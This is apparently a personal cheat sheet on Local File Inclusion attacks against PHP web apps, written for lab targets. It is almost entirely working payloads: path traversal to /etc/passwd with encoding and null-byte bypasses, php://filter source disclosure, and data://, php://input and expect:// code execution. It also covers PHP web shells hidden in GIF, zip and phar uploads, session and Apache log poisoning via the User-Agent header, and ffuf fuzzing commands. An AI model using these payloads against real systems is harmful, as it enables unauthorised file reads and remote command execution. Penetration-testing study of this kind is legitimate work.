Local File Inclusion (LFI)

http://10.129.42.65/shell.php?cmd=id

ORRRRRRRRRRRRRR

http://10.129.42.65/shell.php&cmd=id

/index.php?language=../../../../etc/passwd

/index.php?language=../../../usr/share/flags/flag.txt

/index.php?language=/../../../etc/passwd

/index.php?language=....//....//....//....//etc/passwd

# Url encoded of /index.php?language=../../../../etc/passwd
/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64

/index.php?language=./languages/../../../../etc/passwd

echo -n "non_existing_directory/../../../etc/passwd/" && for i in {1..2048}; do echo -n "./"; done
non_existing_directory/../../../etc/passwd/./././<SNIP>././././

/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]

# Null Bytes
# Php version 5.5 or older
# It will ignore the .php that will be appended after the passwd
# Like /etc/passwd.php to /etc/passwd
/etc/passwd%00
/etc/passwd%00.php
/index.php?language=../../../../etc/passwd%00

# First we need to find some page that we can access
ffuf -w /opt/useful/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://<SERVER_IP>:<PORT>/FUZZ.php

# Then just access it from the web
/index.php?language=config

# Just convert it to base64 first
/index.php?language=php://filter/read=convert.base64-encode/resource=config

# This will use the 
# It will execute <?php system($_GET["cmd"]); ?>
echo '<?php system($_GET["cmd"]); ?>' | base64

# Then base64 of cmd then url encoded 
# PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==&cmd=id
/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id

# We could also use the curl to extract the specific data that we need
curl -s 'http://<SERVER_IP>:<PORT>/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id' | grep uid

# Apache configuration file found at (/etc/php/X.Y/apache2/php.ini) 
# Nginx for (/etc/php/X.Y/fpm/php.ini) 
# Where X.Y is your install PHP version
/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"

# Then we need to find the allow url include
# It means that we can read files in the system
echo 'W1BIUF0KCjs7Ozs7Ozs7O...SNIP...4KO2ZmaS5wcmVsb2FkPQo=' | base64 -d | grep allow_url_include

# We could also use the INPUT DATA so that we can execute some commands
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id" | grep uid

# We could also get the base64 encoded then grep the word expect
echo 'W1BIUF0KCjs7Ozs7Ozs7O...SNIP...4KO2ZmaS5wcmVsb2FkPQo=' | base64 -d | grep expect

# Then we could just use that expect function to execute some commands
curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"

# Put GIF8 to manipulate magic bytes
echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif

# Find first the directory where the images was saved
# It is on source page
<img src="/profile_images/shell.gif" class="profile-image" id="profile-image">

/index.php?language=./profile_images/shell.gif&cmd=id

# First we need to create a payload and zip it to shell.jpg
# After that we need to upload the shell.jpg
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php

# Just access it using the zip PHP function
# It will use the shell.jpg and get to the shell.php payload then execute the id
/index.php?language=zip://./profile_images/shell.jpg%23shell.php&cmd=id

<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');

$phar->stopBuffering();

-------------------------------------------------------------------------------------
# We need to using the phar to create a payload and save it to shell.jpg
php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg

-------------------------------------------------------------------------------------
# Then we just execute the shell.jpg using the phar function
/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id

# First we need to get the session id from the cookies in developers tool
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd

# Then we can try to poison it first and see if the server saves it
/index.php?language=session_poisoning

# Then view again the session id from the cookie
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd

# Now lets try to upload the PHP web shell in URL encoded
/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E

# They let's navigate to session id again
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id

# Apache logs are located in /var/log/apache2/ on Linux 
# Apache logs are located in C:\xampp\apache\logs\ on Windows
# Nginx logs are located in /var/log/nginx/ on Linux 
# Nginx logs are located in C:\nginx\log\ on Windows

# Access the logs 
/index.php?language=/var/log/apache2/access.log

# Intercept the access.log using Burp
# Change the User-Agent to Apache Log Poisoning
# Then just see if it works

# Then we will send another one with the PHP web shell
# ORRRR
# Then we can also use the curl command to send request for User-Agent PHP web shell
# There's two choices on how we will get a PHP web shell
curl -s "http://<SERVER_IP>:<PORT>/index.php" -A "<?php system($_GET['cmd']); ?>"

# After that we can now just add &cmd=id 
# Then we can now execute some commands

# We can use ffuf to find some parameter names 
# Like the parameter "language="
ffuf -w /usr/share/wordlists/seclists/SecLists-master/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287

# We can use ffuf to find some availabe LFI/RFI payload 
ffuf -w /usr/share/wordlists/seclists/SecLists-master/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287

# We can use ffuf to find the web root folder/directory
# Just change the index.php with the current web page
ffuf -w /usr/share/wordlists/seclists/SecLists-master/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287

# DONT TRY TO ACCESS THE /FUZZ/index.php BECAUSE IT WILL JUST CONTINUE TO DISPLAY THE index.php AND IT WILL CAUSE DOS TO THE SERVER

# We can use ffuf to find some configuration on the web
ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287

# After that we can use the curl to get the page source
curl http://<SERVER_IP>:<PORT>/index.php?language=../../../../etc/apache2/apache2.conf

# We can also see the global variable in the configuration
curl http://<SERVER_IP>:<PORT>/index.php?language=../../../../etc/apache2/envvars

PreviousSQL Injection NextRemote File Inclusion

Last updated 11 months ago